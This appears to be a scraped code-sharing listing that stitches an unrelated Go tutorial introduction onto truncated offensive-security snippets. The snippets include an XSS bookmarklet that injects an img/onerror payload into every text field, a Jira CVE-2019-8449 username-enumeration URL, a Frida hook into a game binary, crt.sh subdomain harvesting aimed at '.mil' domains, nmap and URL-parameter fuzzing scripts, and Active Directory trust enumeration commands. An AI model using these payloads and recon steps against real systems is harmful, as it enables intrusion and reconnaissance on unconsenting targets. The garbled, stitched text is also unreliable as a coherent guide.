This is inspired by A half-hour to learn Rust and Zig in 30 minutes.
Your first Go program as a classical "Hello World" is pretty simple:
First we create a workspace for our project:
| javascript:(function(){for (var t = document.getElementsByTagName("input"), e = 0; e < t.length; e++) "text" == t[e].getAttribute("type") && (t[e].value = '"><img src onerror=alert(document.domain)>')})();void(0) |
| import xml.etree.ElementTree as ET | |
| import urllib | |
| import base64 | |
| import math | |
| import sys | |
| import re | |
| # usage: Open Burp, navigate to proxy history, ctrl-a to select all records, right click and "Save Items" as an .xml file. | |
| # python burplist.py burprequests.xml | |
| # output is saved to wordlist.txt |
| cve-2019-8449 | |
| The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
| https://jira.atlassian.com/browse/JRASERVER-69796 | |
| https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
| ===================================================================================================================================== |
| import { log } from "./logger"; | |
| import { AssertionError } from "assert"; | |
| const libil2cpp = Process.getModuleByName("libil2cpp.so"); | |
| const libil2cppb = libil2cpp.base; | |
| const playerinfo_serialize = libil2cppb.add(0x6c2e30); | |
| const playerinfo_deserialize = libil2cppb.add(0x6c316c); | |
| console.log("Starting script.."); | |
| function readString(pointr:NativePointer){ |
| # Copyright 2017-2020 Jeff Foley. All rights reserved. | |
| # Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file. | |
| # Should results only be collected passively and without DNS resolution? Not recommended. | |
| #mode = passive | |
| mode = active | |
| # The directory that stores the Cayley graph database and other output files | |
| # The default for Linux systems is: $HOME/.config/amass | |
| #output_directory = amass |
| require 'open3' | |
| require 'net/http' | |
| require 'nokogiri' | |
| require 'parallel' | |
| # Requires the nokogiri gem (`gem install nokogiri`), the parallel gem (`gem install parallel`) and the psql client for PostgreSQL. | |
| def crtsh | |
| Open3.pipeline_rw 'psql -t -h crt.sh -p 5432 -U guest certwatch', "sed -e 's:^ *::g' -e 's:^*\\.::g' -e '/^$/d'", 'sort -u', "sed -e 's:*.::g'" do |i, o, t| | |
| i.write("SELECT ci.NAME_VALUE NAME_VALUE FROM certificate_identity ci WHERE ci.NAME_TYPE = 'dNSName' AND reverse(lower(ci.NAME_VALUE)) LIKE reverse(lower('%.mil'));") |
| #!/bin/bash | |
| # Use nmap to find open ports fast and then run a detailed scan on the returned ports | |
| if [ -z "$1" ] | |
| then | |
| echo "__nmap_fast__" | |
| echo "Usage: ./nmap_fast TARGET_HOSTNAME" | |
| fi | |
| TARGET_HOSTNAME=$1 |
| curl -s "http://web.archive.org/cdx/search/cdx?url=*.bugcrowd.com/*&output=text&fl=original&collapse=urlkey" | grep -P "=" | sed "/\b\(jpg\|png\|js\|svg\|css\|gif\|jpeg\|woff\|woff2\)\b/d" > Output.txt ; for i in $(cat Output.txt);do URL="${i}"; LIST=(${URL//[=&]/=FUZZ&}); echo ${LIST} | awk -F'=' -vOFS='=' '{$NF="FUZZ"}1;' >> Passive_Collecting_URLParamter.txt ; done ; rm Output.txt ; sort -u Passive_Collecting_URLParamter.txt > Passive_Collecting_URLParamter_Uniq.txt |
| Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts | |
| ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() | |
| Grab Forest Trusts. | |
| ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships() | |